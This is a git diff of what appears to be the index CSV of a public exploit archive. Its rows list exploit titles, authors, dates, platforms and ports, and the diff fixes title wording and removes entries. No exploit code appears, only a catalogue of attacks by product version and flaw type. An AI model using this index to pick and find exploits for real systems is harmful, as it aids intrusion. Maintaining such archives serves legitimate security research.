diff --git a/files.csv b/files.csv
index 2c44dadc7..5043c24b4 100644
--- a/files.csv
+++ b/files.csv
@@ -4793,7 +4793,7 @@ id,file,description,date,author,platform,type,port
38564,platforms/windows/dos/38564.py,"Sam Spade 1.14 - Scan From IP Address Field (SEH) Overflow Crash (SEH) (PoC)",2015-10-29,"Luis Martínez",windows,dos,0
38566,platforms/hardware/dos/38566.py,"NetUSB - Kernel Stack Buffer Overflow",2015-10-29,"Adrián Ruiz Bermudo",hardware,dos,0
38580,platforms/windows/dos/38580.txt,"Microsoft Windows - NtCreateLowBoxToken Handle Capture Local Denial of Service / Privilege Escalation (MS15-111)",2015-10-30,"Google Security Research",windows,dos,0
-38589,platforms/linux/dos/38589.c,"Linux Kernel 3.0.5 - 'test_root()' Function Local Denial of Service",2013-06-05,"Jonathan Salwan",linux,dos,0
+38589,platforms/linux/dos/38589.c,"Linux Kernel 3.0.5 - 'test_root()' Local Denial of Service",2013-06-05,"Jonathan Salwan",linux,dos,0
38595,platforms/multiple/dos/38595.txt,"Oracle VM VirtualBox 4.0 - 'tracepath' Local Denial of Service",2013-06-26,"Thomas Dreibholz",multiple,dos,0
38610,platforms/android/dos/38610.txt,"Samsung Galaxy S6 Samsung Gallery - GIF Parsing Crash",2015-11-03,"Google Security Research",android,dos,0
38611,platforms/android/dos/38611.txt,"Samsung Galaxy S6 - android.media.process Face Recognition Memory Corruption",2015-11-03,"Google Security Research",android,dos,0
@@ -5735,7 +5735,7 @@ id,file,description,date,author,platform,type,port
401,platforms/windows/local/401.c,"IPSwitch IMail Server 8.1 - Local Password Decryption Utility",2004-08-18,Adik,windows,local,0
403,platforms/windows/local/403.c,"IPD (Integrity Protection Driver) - Local Exploit",2004-08-18,anonymous,windows,local,0
411,platforms/linux/local/411.c,"Sendmail 8.11.x (Linux/i386) - Exploit",2001-01-01,sd,linux,local,0
-417,platforms/linux/local/417.c,"SquirrelMail - 'chpasswd' Privilege Escalation (Brute Force Exploit)",2004-08-25,Bytes,linux,local,0
+417,platforms/linux/local/417.c,"SquirrelMail - 'chpasswd' Local Privilege Escalation (Brute Force)",2004-08-25,Bytes,linux,local,0
434,platforms/linux/local/434.sh,"CDRDAO - Privilege Escalation",2004-09-07,"Karol Wiêsek",linux,local,0
438,platforms/linux/local/438.c,"CDRecord's ReadCD - '$RSH' 'exec()' SUID Shell Creation",2004-09-11,I)ruid,linux,local,0
466,platforms/linux/local/466.pl,"htpasswd Apache 1.3.31 - Local Exploit",2004-09-16,"Luiz Fernando Camargo",linux,local,0
@@ -6205,7 +6205,7 @@ id,file,description,date,author,platform,type,port
7135,platforms/windows/local/7135.htm,"Opera 9.62 - 'file://' Local Heap Overflow",2008-11-17,"Guido Landi",windows,local,0
7171,platforms/multiple/local/7171.txt,"PHP 5.2.6 - 'error_log' Safe_mode Bypass Exploit",2008-11-20,SecurityReason,multiple,local,0
7177,platforms/linux/local/7177.c,"Oracle Database Vault - 'ptrace(2)' Privilege Escalation",2008-11-20,"Jakub Wartak",linux,local,0
-40988,platforms/windows/local/40988.c,"Kaspersky 17.0.0 - Local CA root Incorrectly Protected",2017-01-04,"Google Security Research",windows,local,0
+40988,platforms/windows/local/40988.c,"Kaspersky 17.0.0 - Local CA Root Incorrectly Protected",2017-01-04,"Google Security Research",windows,local,0
7264,platforms/windows/local/7264.txt,"Apache Tomcat (Windows) - 'runtime.getRuntime().exec()' Privilege Escalation",2008-11-28,Abysssec,windows,local,0
7309,platforms/windows/local/7309.pl,"Cain & Abel 4.9.24 - '.rdp' Stack Overflow",2008-11-30,SkD,windows,local,0
7313,platforms/linux/local/7313.sh,"Debian - (Symlink In Login) Arbitrary File Ownership (PoC)",2008-12-01,"Paul Szabo",linux,local,0
@@ -6720,7 +6720,7 @@ id,file,description,date,author,platform,type,port
13761,platforms/windows/local/13761.pl,"Easy CD-DA Recorder 2007 - Buffer Overflow (SEH)",2010-06-07,chap0,windows,local,0
13763,platforms/windows/local/13763.pl,"Audio Converter 8.1 - Stack Buffer Overflow (PoC) ROP/WPM",2010-06-07,sud0,windows,local,0
13767,platforms/windows/local/13767.c,"SureThing CD Labeler (m3u/pls) - Unicode Stack Overflow (PoC)",2010-06-08,mr_me,windows,local,0
-13768,platforms/php/local/13768.py,"Castripper 2.50.70 - '.pls' File Stack Buffer Overflow DEP Bypass",2010-06-08,mr_me,php,local,0
+13768,platforms/php/local/13768.py,"Castripper 2.50.70 - '.pls' File Stack Buffer Overflow (DEP Bypass)",2010-06-08,mr_me,php,local,0
13806,platforms/windows/local/13806.txt,"ActivePerl 5.8.8.817 - Buffer Overflow",2010-06-09,PoisonCode,windows,local,0
13820,platforms/windows/local/13820.pl,"Power Tab Editor 1.7 (Build 80) - Buffer Overflow",2010-06-11,sud0,windows,local,0
13895,platforms/windows/local/13895.py,"Rosoft Audio Converter 4.4.4 - Buffer Overflow",2010-06-16,blake,windows,local,0
@@ -7184,7 +7184,7 @@ id,file,description,date,author,platform,type,port
18693,platforms/windows/local/18693.py,"BlazeVideo HDTV Player 6.6 Professional - (SEH + ASLR + DEP Bypass)",2012-04-03,b33f,windows,local,0
18710,platforms/windows/local/18710.rb,"Csound - '.hetro' File Handling Stack Buffer Overflow (Metasploit)",2012-04-06,Metasploit,windows,local,0
18726,platforms/windows/local/18726.py,"Mini-stream RM-MP3 Converter 3.1.2.2 - Local Buffer Overflow",2012-04-09,"SkY-NeT SySteMs",windows,local,0
-18733,platforms/linux/local/18733.py,"WICD - Local Privilege Esclation Exploit",2012-04-12,anonymous,linux,local,0
+18733,platforms/linux/local/18733.py,"WICD 1.7.1 - Local Privilege Escalation",2012-04-12,anonymous,linux,local,0
18749,platforms/osx/local/18749.py,"Microsoft Office 2008 SP0 (Mac) - RTF pFragments Exploit",2012-04-18,"Abhishek Lyall",osx,local,0
18747,platforms/windows/local/18747.rb,"CyberLink Power2Go - name Attribute (p2g) Stack Buffer Overflow (Metasploit)",2012-04-18,Metasploit,windows,local,0
18748,platforms/windows/local/18748.rb,"GSM SIM Editor 5.15 - Buffer Overflow (Metasploit)",2012-04-18,Metasploit,windows,local,0
@@ -8821,7 +8821,7 @@ id,file,description,date,author,platform,type,port
39446,platforms/win_x86/local/39446.py,"Microsoft Windows 7 (x86) - 'afd.sys' Dangling Pointer Privilege Escalation (MS14-040)",2016-02-15,"Rick Larabee",win_x86,local,0
39480,platforms/windows/local/39480.py,"Core FTP Server 1.2 - Buffer Overflow (PoC)",2016-02-22,INSECT.B,windows,local,0
39508,platforms/windows/local/39508.ps1,"Comodo Anti-Virus - 'SHFolder.dll' Local Privilege Escalation",2016-02-29,Laughing_Mantis,windows,local,0
-39510,platforms/windows/local/39510.txt,"Crouzet em4 soft 1.1.04 and M3 soft 3.1.2.0 - Insecure File Permissions",2016-03-01,LiquidWorm,windows,local,0
+39510,platforms/windows/local/39510.txt,"Crouzet em4 soft 1.1.04 / M3 soft 3.1.2.0 - Insecure File Permissions",2016-03-01,LiquidWorm,windows,local,0
39520,platforms/win_x86-64/local/39520.txt,"Secret Net 7 and Secret Net Studio 8 - Privilege Escalation",2016-03-02,Cr4sh,win_x86-64,local,0
39523,platforms/windows/local/39523.rb,"AppLocker - Execution Prevention Bypass (Metasploit)",2016-03-03,Metasploit,windows,local,0
39525,platforms/win_x86-64/local/39525.py,"Microsoft Windows 7 (x64) - 'afd.sys' Dangling Pointer Privilege Escalation (MS14-040)",2016-03-07,"Rick Larabee",win_x86-64,local,0
@@ -9128,15 +9128,15 @@ id,file,description,date,author,platform,type,port
42255,platforms/linux/local/42255.py,"JAD Java Decompiler 1.5.8e - Buffer Overflow",2017-06-26,"Juan Sacco",linux,local,0
42265,platforms/linux/local/42265.py,"Flat Assembler 1.7.21 - Buffer Overflow",2017-06-28,"Juan Sacco",linux,local,0
42267,platforms/windows/local/42267.py,"Easy File Sharing Web Server 7.2 - Account Import Local Buffer Overflow (SEH)",2017-06-28,Chako,windows,local,0
-42270,platforms/solaris_x86/local/42270.c,"Oracle Solaris 11.1/11.3 (RSH) - Local Privilege Escalation 'Stack Clash' Exploit",2017-06-28,"Qualys Corporation",solaris_x86,local,0
-42271,platforms/openbsd/local/42271.c,"OpenBSD - 'at' Local Privilege Escalation 'Stack Clash' Exploit",2017-06-28,"Qualys Corporation",openbsd,local,0
+42270,platforms/solaris_x86/local/42270.c,"Oracle Solaris 11.1/11.3 (RSH) - 'Stack Clash' Local Privilege Escalation",2017-06-28,"Qualys Corporation",solaris_x86,local,0
+42271,platforms/openbsd/local/42271.c,"OpenBSD - 'at' 'Stack Clash' Local Privilege Escalation",2017-06-28,"Qualys Corporation",openbsd,local,0
42273,platforms/lin_x86/local/42273.c,"Linux Kernel - 'offset2lib' 'Stack Clash' Exploit",2017-06-28,"Qualys Corporation",lin_x86,local,0
-42274,platforms/lin_x86/local/42274.c,"Linux Kernel (Debian 7/8/9/10 / Fedora 23/24/25 / CentOS 5.3/5.11/6.0/6.8/7.2.1511) - 'ldso_hwcap' Local Privilege Escalation 'Stack Clash' Exploit",2017-06-28,"Qualys Corporation",lin_x86,local,0
-42275,platforms/lin_x86-64/local/42275.c,"Linux Kernel (Debian 7.7/8.5/9.0 / Ubuntu 14.04.2/16.04.2/17.04 / Fedora 22/25 / CentOS 7.3.1611) - 'ldso_hwcap_64' Local Privilege Escalation 'Stack Clash' Exploit",2017-06-28,"Qualys Corporation",lin_x86-64,local,0
-42276,platforms/lin_x86/local/42276.c,"Linux Kernel (Debian 9/10 / Ubuntu 14.04.5/16.04.2/17.04 / Fedora 23/24/25) - 'ldso_dynamic' Local Privilege Escalation 'Stack Clash' Exploit",2017-06-28,"Qualys Corporation",lin_x86,local,0
+42274,platforms/lin_x86/local/42274.c,"Linux Kernel (Debian 7/8/9/10 / Fedora 23/24/25 / CentOS 5.3/5.11/6.0/6.8/7.2.1511) - 'ldso_hwcap' 'Stack Clash' Local Privilege Escalation",2017-06-28,"Qualys Corporation",lin_x86,local,0
+42275,platforms/lin_x86-64/local/42275.c,"Linux Kernel (Debian 7.7/8.5/9.0 / Ubuntu 14.04.2/16.04.2/17.04 / Fedora 22/25 / CentOS 7.3.1611) - 'ldso_hwcap_64' 'Stack Clash' Local Privilege Escalation",2017-06-28,"Qualys Corporation",lin_x86-64,local,0
+42276,platforms/lin_x86/local/42276.c,"Linux Kernel (Debian 9/10 / Ubuntu 14.04.5/16.04.2/17.04 / Fedora 23/24/25) - 'ldso_dynamic' 'Stack Clash' Local Privilege Escalation",2017-06-28,"Qualys Corporation",lin_x86,local,0
42310,platforms/windows/local/42310.txt,"Pelco VideoXpert 1.12.105 - Privilege Escalation",2017-07-10,LiquidWorm,windows,local,0
42325,platforms/windows/local/42325.py,"Counter Strike: Condition Zero - '.BSP' Map File Code Execution",2017-07-07,"Grant Hernandez",windows,local,0
-42334,platforms/macos/local/42334.txt,"Hashicorp vagrant-vmware-fusion <= 4.0.20 - Local root Privilege Esclation",2017-07-18,"Mark Wadham",macos,local,0
+42334,platforms/macos/local/42334.txt,"Hashicorp vagrant-vmware-fusion < 4.0.20 - Local Root Privilege Escalation",2017-07-18,"Mark Wadham",macos,local,0
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@@ -10710,7 +10710,6 @@ id,file,description,date,author,platform,type,port
14522,platforms/windows/remote/14522.rb,"Xerver 4.32 - Source Disclosure / HTTP Authentication Bypass (Metasploit)",2010-08-01,"Ben Schmidt",windows,remote,0
14539,platforms/windows/remote/14539.html,"FathFTP 1.8 - (RasIsConnected Method) ActiveX Buffer Overflow (SEH)",2010-08-03,Madjix,windows,remote,0
14536,platforms/hardware/remote/14536.txt,"EMC Celerra NAS Appliance - Unauthorized Access to Root NFS Export",2010-08-03,"Trustwave's SpiderLabs",hardware,remote,0
-14547,platforms/windows/remote/14547.txt,"HP OpenView Network Node Manager (OV NNM) 7.53 - OvJavaLocale Buffer Overflow",2010-08-03,"Nahuel Riva",windows,remote,0
14551,platforms/windows/remote/14551.html,"FathFTP 1.8 - (DeleteFile Method) ActiveX Buffer Overflow (SEH)",2010-08-04,Madjix,windows,remote,0
14552,platforms/windows/remote/14552.html,"FathFTP 1.8 - (EnumFiles Method) ActiveX Buffer Overflow (SEH)",2010-08-04,Madjix,windows,remote,0
14553,platforms/windows/remote/14553.html,"FathFTP 1.8 - (FileExists Method) ActiveX Buffer Overflow (SEH)",2010-08-04,H4kr3m,windows,remote,0
@@ -10726,7 +10725,6 @@ id,file,description,date,author,platform,type,port
14641,platforms/multiple/remote/14641.py,"Adobe ColdFusion - Directory Traversal",2010-08-14,Unknown,multiple,remote,0
14674,platforms/windows/remote/14674.txt,"Microsoft Windows - 'srv2.sys' SMB Negotiate ProcessID Function Table Dereference (MS09-050)",2010-08-17,"Piotr Bania",windows,remote,0
14779,platforms/windows/remote/14779.pl,"Deepin TFTP Server 1.25 - Directory Traversal",2010-08-25,demonalex,windows,remote,0
-14818,platforms/linux/remote/14818.pl,"McAfee LinuxShield 1.5.1 - Local/Remote File Inclusion / Remote Code Execution",2010-08-27,"Nikolas Sotiriu",linux,remote,0
14853,platforms/windows/remote/14853.py,"Adobe Acrobat Reader and Flash Player - 'newclass' Invalid Pointer Exploit",2010-09-01,Abysssec,windows,remote,0
14856,platforms/windows/remote/14856.txt,"TFTPDWIN 0.4.2 - Directory Traversal",2010-09-01,chr1x,windows,remote,0
14857,platforms/windows/remote/14857.txt,"tftp desktop 2.5 - Directory Traversal",2010-09-01,chr1x,windows,remote,0
@@ -11614,7 +11612,6 @@ id,file,description,date,author,platform,type,port
18623,platforms/windows/remote/18623.txt,"LANDesk Lenovo ThinkManagement Suite 9.0.3 Core Server - Arbitrary File Deletion",2012-03-19,rgod,windows,remote,0
18624,platforms/windows/remote/18624.txt,"2X Client for RDP 10.1.1204 - ClientSystem Class ActiveX Control Download and Execute",2012-03-19,rgod,windows,remote,0
18625,platforms/windows/remote/18625.txt,"2X ApplicationServer 10.1 - TuxSystem Class ActiveX Control Remote File Overwrite",2012-03-19,rgod,windows,remote,0
-18932,platforms/linux/remote/18932.py,"Symantec Web Gateway 5.0.2 - Local/Remote File Inclusion / Remote Code Execution",2012-05-26,muts,linux,remote,0
18634,platforms/windows/remote/18634.rb,"Dell Webcam CrazyTalk - ActiveX BackImage (Metasploit)",2012-03-21,Metasploit,windows,remote,0
18640,platforms/windows/remote/18640.txt,"Google Talk - 'gtalk://' Deprecated URI Handler Parameter Injection",2012-03-22,rgod,windows,remote,0
18642,platforms/windows/remote/18642.rb,"Microsoft Internet Explorer - Object Memory Use-After-Free (MS10-002) (Metasploit)",2012-03-22,Metasploit,windows,remote,0
@@ -12000,7 +11997,6 @@ id,file,description,date,author,platform,type,port
20059,platforms/cgi/remote/20059.txt,"CGI-World Poll It 2.0 - Internal Variable Override",2000-07-04,"Adrian Daminato",cgi,remote,0
20060,platforms/linux/remote/20060.c,"BitchX IRC Client 75p1/75p3/1.0 c16 - '/INVITE' Format String",2000-07-05,RaiSe,linux,remote,0
20061,platforms/linux/remote/20061.c,"Canna Canna 3.5 b2 - Remote Buffer Overflow",2000-07-02,UNYUN,linux,remote,0
-20064,platforms/linux/remote/20064.py,"Symantec Web Gateway 5.0.3.18 - Local/Remote File Inclusion / Remote Command Execution",2012-07-24,muts,linux,remote,0
20065,platforms/windows/remote/20065.txt,"DrPhibez and Nitro187 Guild FTPD 0.9.7 - File Existence Disclosure",2000-07-08,"Andrew Lewis",windows,remote,0
20066,platforms/windows/remote/20066.java,"Michael Lamont Savant Web Server 2.1/3.0 - Buffer Overflow",2000-07-03,Wizdumb,windows,remote,0
20067,platforms/hardware/remote/20067.c,"PIX Firewall 2.7/3.x/4.x/5 - Forged TCP RST",2000-07-10,"Citec Network Securities",hardware,remote,0
@@ -13304,7 +13300,6 @@ id,file,description,date,author,platform,type,port
23864,platforms/linux/remote/23864.txt,"xweb 1.0 - Directory Traversal",2004-03-22,"Donato Ferrante",linux,remote,0
23871,platforms/windows/remote/23871.txt,"Centrinity FirstClass HTTP Server 5/7 - TargetName Parameter Cross-Site Scripting",2004-03-22,"Richard Maudsley",windows,remote,0
23873,platforms/multiple/remote/23873.c,"Mythic Entertainment Dark Age of Camelot 1.6x - Encryption Key Signing",2004-03-23,"Todd Chapman",multiple,remote,0
-23875,platforms/windows/remote/23875.txt,"Trend Micro Interscan VirusWall localweb - Directory Traversal",2004-03-24,"Tri Huynh",windows,remote,0
23879,platforms/windows/remote/23879.txt,"HP Web Jetadmin 7.5.2456 - setinfo.hts Script Directory Traversal",2004-03-24,wirepair,windows,remote,0
23880,platforms/windows/remote/23880.txt,"HP Web Jetadmin 7.5.2456 - Arbitrary Command Execution",2004-03-24,wirepair,windows,remote,0
23881,platforms/linux/remote/23881.txt,"Emil 2.x - Multiple Buffer Overrun / Format String Vulnerabilities",2004-03-25,"Ulf Harnhammar",linux,remote,0
@@ -13731,7 +13726,6 @@ id,file,description,date,author,platform,type,port
26003,platforms/multiple/remote/26003.txt,"Oracle Reports Server 6.0.8/9.0.x - Arbitrary File Disclosure",2005-07-19,"Alexander Kornbrust",multiple,remote,0
26004,platforms/multiple/remote/26004.txt,"Oracle Reports Server 10g 9.0.2 - Multiple Cross-Site Scripting Vulnerabilities",2005-07-19,"Alexander Kornbrust",multiple,remote,0
26006,platforms/multiple/remote/26006.txt,"Oracle Reports Server 6.0.8/9.0.x - Unauthorized Report Execution",2005-07-19,"Alexander Kornbrust",multiple,remote,0
-26012,platforms/windows/remote/26012.rb,"Novell Zenworks Mobile Device Managment 2.6.1/2.7.0 - Local File Inclusion (Metasploit)",2013-06-07,Metasploit,windows,remote,80
26013,platforms/multiple/remote/26013.txt,"Oracle Forms 6i/9i/4.5.10/5.0/6.0.8/10g Services - Unauthorized Form Execution",2005-07-19,"Alexander Kornbrust",multiple,remote,0
26022,platforms/hardware/remote/26022.txt,"ECI Telecom B-FOCuS Router 312+ - Unauthorized Access",2005-07-25,d.is.evil,hardware,remote,0
26024,platforms/linux/remote/26024.txt,"sap internet graphics server 6.40 - Directory Traversal",2005-07-25,"Martin O'Neal",linux,remote,0
@@ -13824,7 +13818,6 @@ id,file,description,date,author,platform,type,port
27294,platforms/php/remote/27294.rb,"PineApp Mail-SeCure - ldapsyncnow.php Arbitrary Command Execution (Metasploit)",2013-08-02,Metasploit,php,remote,7443
27295,platforms/unix/remote/27295.rb,"PineApp Mail-SeCure - livelog.html Arbitrary Command Execution (Metasploit)",2013-08-02,Metasploit,unix,remote,7443
27319,platforms/hardware/remote/27319.txt,"Thomson SpeedTouch 500 Series - NewUser Function 31 Variable Persistent User Creation",2006-02-25,"Preben Nylokken",hardware,remote,0
-27320,platforms/hardware/remote/27320.txt,"Thomson SpeedTouch 500 Series - LocalNetwork Page name Parameter Cross-Site Scripting",2006-02-25,"Preben Nylokken",hardware,remote,0
27325,platforms/windows/remote/27325.txt,"DirectContact 0.3.b - Directory Traversal",2006-02-27,"Donato Ferrante",windows,remote,0
27326,platforms/linux/remote/27326.txt,"MySQL 5.0.18 - Query Logging Bypass",2006-02-27,1dt.w0lf,linux,remote,0
27378,platforms/windows/remote/27378.txt,"Easy File Sharing Web Server 3.2 - Full Path Request Arbitrary File Upload",2006-03-09,"Revnic Vasile",windows,remote,0
@@ -14164,7 +14157,6 @@ id,file,description,date,author,platform,type,port
30809,platforms/windows/remote/30809.txt,"SafeNet Sentinel Protection Server 7.x/Keys Server 1.0.3 - Directory Traversal",2007-11-26,"Corey Lebleu",windows,remote,0
30470,platforms/unix/remote/30470.rb,"Synology DiskStation Manager - SLICEUPLOAD Remote Command Execution (Metasploit)",2013-12-24,Metasploit,unix,remote,5000
30471,platforms/linux/remote/30471.rb,"OpenSIS 'modname' - PHP Code Execution (Metasploit)",2013-12-24,Metasploit,linux,remote,80
-30472,platforms/linux/remote/30472.rb,"Zimbra Collaboration Server 7.2.2/8.0.2 - Local File Inclusion (Metasploit)",2013-12-24,Metasploit,linux,remote,7071
30473,platforms/unix/remote/30473.rb,"HP SiteScope issueSiebelCmd - Remote Code Execution (Metasploit)",2013-12-24,Metasploit,unix,remote,8080
30485,platforms/hardware/remote/30485.html,"ZYXEL ZyWALL 2 3.62 - Forms/General_1 sysSystemName Parameter Cross-Site Scripting",2007-08-10,"Henri Lindberg",hardware,remote,0
30490,platforms/windows/remote/30490.txt,"Microsoft Internet Explorer 5.0.1 - 'TBLinf32.dll' ActiveX Control Remote Code Execution",2007-05-08,"Brett Moore",windows,remote,0
@@ -14578,7 +14570,6 @@ id,file,description,date,author,platform,type,port
33084,platforms/multiple/remote/33084.txt,"Oracle 9i/10g Database - Network Foundation Remote",2009-06-14,"Dennis Yurichev",multiple,remote,0
33089,platforms/windows/remote/33089.pl,"iDefense COMRaider - ActiveX Control Multiple Insecure Method Vulnerabilities",2009-06-17,"Khashayar Fereidani",windows,remote,0
33351,platforms/novell/remote/33351.pl,"Novell eDirectory 8.8 - '/dhost/modules?I:' Buffer Overflow",2009-11-12,HACKATTACK,novell,remote,0
-33578,platforms/multiple/remote/33578.txt,"XAMPP 1.6.x - 'showcode.php' Local File Inclusion",2009-07-16,MustLive,multiple,remote,0
33580,platforms/hardware/remote/33580.txt,"COMTREND CT-507 IT ADSL Router - 'scvrtsrv.cmd' Cross-Site Scripting",2010-01-29,Yoyahack,hardware,remote,0
33095,platforms/windows/remote/33095.rb,"Adobe Flash Player - Type Confusion Remote Code Execution (Metasploit)",2014-04-29,Metasploit,windows,remote,0
33103,platforms/linux/remote/33103.html,"Mozilla Firefox 3.5.1 - Error Page Address Bar URI Spoofing",2009-06-24,"Juan Pablo Lopez Yacubian",linux,remote,0
@@ -14680,7 +14671,6 @@ id,file,description,date,author,platform,type,port
33705,platforms/windows/remote/33705.txt,"Authentium Command On Demand ActiveX Control - Multiple Buffer Overflow Vulnerabilities",2010-03-04,"Nikolas Sotiriu",windows,remote,0
33712,platforms/windows/remote/33712.txt,"VideoLAN VLC Media Player 1.0.x - Bookmark Creation Buffer Overflow",2010-03-05,"Gjoko Krstic",windows,remote,0
33739,platforms/hardware/remote/33739.txt,"Yealink VoIP Phone SIP-T38G - Default Credentials",2014-06-13,Mr.Un1k0d3r,hardware,remote,0
-33740,platforms/hardware/remote/33740.txt,"Yealink VoIP Phone SIP-T38G - Local File Inclusion",2014-06-13,Mr.Un1k0d3r,hardware,remote,0
33741,platforms/hardware/remote/33741.txt,"Yealink VoIP Phone SIP-T38G - Remote Command Execution",2014-06-13,Mr.Un1k0d3r,hardware,remote,0
33742,platforms/hardware/remote/33742.txt,"Yealink VoIP Phone SIP-T38G - Privilege Escalation",2014-06-13,Mr.Un1k0d3r,hardware,remote,0
33750,platforms/windows/remote/33750.txt,"Microsoft Windows XP/2000 - Help File Relative Path Remote Command Execution",2010-03-06,Secumania,windows,remote,0
@@ -14942,7 +14932,6 @@ id,file,description,date,author,platform,type,port
35386,platforms/linux/remote/35386.txt,"Logwatch Log File - Special Characters Privilege Escalation",2011-02-24,"Dominik George",linux,remote,0
35398,platforms/multiple/remote/35398.pl,"KMPlayer 2.9.3.1214 - '.ksf' Remote Buffer Overflow",2011-02-28,KedAns-Dz,multiple,remote,0
35399,platforms/windows/remote/35399.pl,"DivX Player 6.x - '.dps' Remote Buffer Overflow",2011-02-28,KedAns-Dz,windows,remote,0
-35410,platforms/windows/remote/35410.py,"InterPhoto Image Gallery 2.4.2 - 'IPLANG' Parameter Local File Inclusion",2011-03-04,"AutoSec Tools",windows,remote,0
35420,platforms/hardware/remote/35420.txt,"IPUX Cube Type CS303C IP Camera - 'UltraMJCamX.ocx' ActiveX Stack Buffer Overflow",2014-12-02,LiquidWorm,hardware,remote,0
35421,platforms/hardware/remote/35421.txt,"IPUX CL5452/CL5132 IP Camera - 'UltraSVCamX.ocx' ActiveX Stack Buffer Overflow",2014-12-02,LiquidWorm,hardware,remote,0
35422,platforms/hardware/remote/35422.txt,"IPUX CS7522/CS2330/CS2030 IP Camera - 'UltraHVCamX.ocx' ActiveX Stack Buffer Overflow",2014-12-02,LiquidWorm,hardware,remote,0
@@ -14967,7 +14956,6 @@ id,file,description,date,author,platform,type,port
35570,platforms/multiple/remote/35570.txt,"python-feedparser 5.0 - 'feedparser/feedparser.py' Cross-Site Scripting",2011-04-05,fazalmajid,multiple,remote,0
35573,platforms/windows/remote/35573.txt,"Microsoft Excel - Buffer Overflow",2011-04-12,"Rodrigo Rubira Branco",windows,remote,0
35581,platforms/linux/remote/35581.rb,"Varnish Cache CLI Interface - Remote Code Execution (Metasploit)",2014-12-19,"Patrick Webster",linux,remote,6082
-35588,platforms/php/remote/35588.rb,"Lotus Mail Encryption Server 2.1.0.1 (Protector for Mail) - Local File Inclusion / Remote Code Execution (Metasploit)",2014-12-22,"Patrick Webster",php,remote,9000
35597,platforms/hardware/remote/35597.txt,"FiberHome HG-110 - Cross-Site Scripting / Directory Traversal",2011-04-08,Zerial,hardware,remote,0
35606,platforms/linux/remote/35606.txt,"MIT Kerberos 5 - kadmind Change Password Feature Remote Code Execution",2011-04-11,"Felipe Ortega",linux,remote,0
35612,platforms/windows/remote/35612.pl,"Winamp 5.6.1 - '.m3u8' Remote Buffer Overflow",2011-04-12,KedAns-Dz,windows,remote,0
@@ -15079,7 +15067,6 @@ id,file,description,date,author,platform,type,port
36256,platforms/hardware/remote/36256.txt,"Multiple Cisco Products - 'file' Parameter Directory Traversal",2011-10-26,"Sandro Gauci",hardware,remote,0
36258,platforms/windows/remote/36258.txt,"XAMPP 1.7.4 - Cross-Site Scripting",2011-10-26,Sangteamtham,windows,remote,0
36264,platforms/php/remote/36264.rb,"Seagate Business NAS - Unauthenticated Remote Command Execution (Metasploit)",2015-03-04,Metasploit,php,remote,80
-36286,platforms/hardware/remote/36286.txt,"DreamBox DM800 - 'file' Parameter Local File Disclosure",2011-11-04,"Todor Donev",hardware,remote,0
36291,platforms/windows/remote/36291.txt,"XAMPP 1.7.7 - 'PHP_SELF' Variable Multiple Cross-Site Scripting Vulnerabilities",2011-11-07,"Gjoko Krstic",windows,remote,0
36304,platforms/windows/remote/36304.rb,"HP Data Protector 8.10 - Remote Command Execution (Metasploit)",2015-03-06,Metasploit,windows,remote,5555
36318,platforms/windows/remote/36318.txt,"Jetty Web Server - Directory Traversal",2011-11-18,"Alexey Sintsov",windows,remote,0
@@ -15153,7 +15140,6 @@ id,file,description,date,author,platform,type,port
36995,platforms/hardware/remote/36995.txt,"F5 FirePass 7.0 - SQL Injection",2012-03-14,anonymous,hardware,remote,0
37169,platforms/linux/remote/37169.rb,"Realtek SDK - Miniigd UPnP SOAP Command Execution (Metasploit)",2015-06-01,Metasploit,linux,remote,52869
36864,platforms/hardware/remote/36864.txt,"Xavi 7968 ADSL Router - Cross-Site Request Forgery (Multiple Function)",2012-02-21,Busindre,hardware,remote,0
-36865,platforms/hardware/remote/36865.txt,"Xavi 7968 ADSL Router - webconfig/lan/lan_config.html/local_lan_config host_name_txtbox Parameter Cross-Site Scripting",2012-02-21,Busindre,hardware,remote,0
36866,platforms/hardware/remote/36866.txt,"Xavi 7968 ADSL Router - webconfig/wan/confirm.html/confirm pvcName Parameter Cross-Site Scripting",2012-02-21,Busindre,hardware,remote,0
36877,platforms/hardware/remote/36877.html,"Multiple D-Link DCS Products - 'security.cgi' Cross-Site Request Forgery",2012-02-23,"Rigan Iimrigan",hardware,remote,0
36880,platforms/windows/remote/36880.rb,"Adobe Flash Player - UncompressViaZlibVariant Uninitialized Memory (Metasploit)",2015-05-01,Metasploit,windows,remote,0
@@ -15239,7 +15225,6 @@ id,file,description,date,author,platform,type,port
37952,platforms/windows/remote/37952.py,"Easy Address Book Web Server 1.6 - USERID Remote Buffer Overflow",2015-08-24,"Tracy Turben",windows,remote,0
37958,platforms/multiple/remote/37958.rb,"Mozilla Firefox - 'pdf.js' Privileged JavaScript Injection (Metasploit)",2015-08-24,Metasploit,multiple,remote,0
37969,platforms/hardware/remote/37969.txt,"FirePass 7.0 SSL VPN - 'refreshURL' Parameter URI redirection",2012-10-21,"Aung Khant",hardware,remote,0
-37982,platforms/hardware/remote/37982.pl,"TP-Link TL-WR841N Router - Local File Inclusion",2012-10-29,"Matan Azugi",hardware,remote,0
37985,platforms/windows/remote/37985.py,"FHFS - FTP/HTTP File Server 2.1.2 Remote Command Execution",2015-08-27,"Naser Farhadi",windows,remote,80
37996,platforms/windows/remote/37996.txt,"Axigen Mail Server - 'Filename' Parameter Directory Traversal",2012-10-31,"Zhao Liang",windows,remote,0
38003,platforms/windows/remote/38003.py,"PCMan FTP Server 2.0.7 - 'GET' Command Buffer Overflow",2015-08-29,Koby,windows,remote,21
@@ -15323,7 +15308,6 @@ id,file,description,date,author,platform,type,port
38591,platforms/hardware/remote/38591.py,"TP-Link TL-PS110U Print Server - 'tplink-enum.py' Security Bypass",2013-06-19,SANTHO,hardware,remote,0
38597,platforms/multiple/remote/38597.txt,"Motion - Multiple Vulnerabilities",2013-06-26,xistence,multiple,remote,0
38599,platforms/win_x86/remote/38599.py,"Symantec pcAnywhere 12.5.0 (Windows x86) - Remote Code Execution",2015-11-02,"Tomislav Paskalev",win_x86,remote,0
-38604,platforms/hardware/remote/38604.txt,"Mobile USB Drive HD - Multiple Local File Inclusion / Arbitrary File Upload Vulnerabilities",2012-06-28,"Benjamin Kunz Mejri",hardware,remote,0
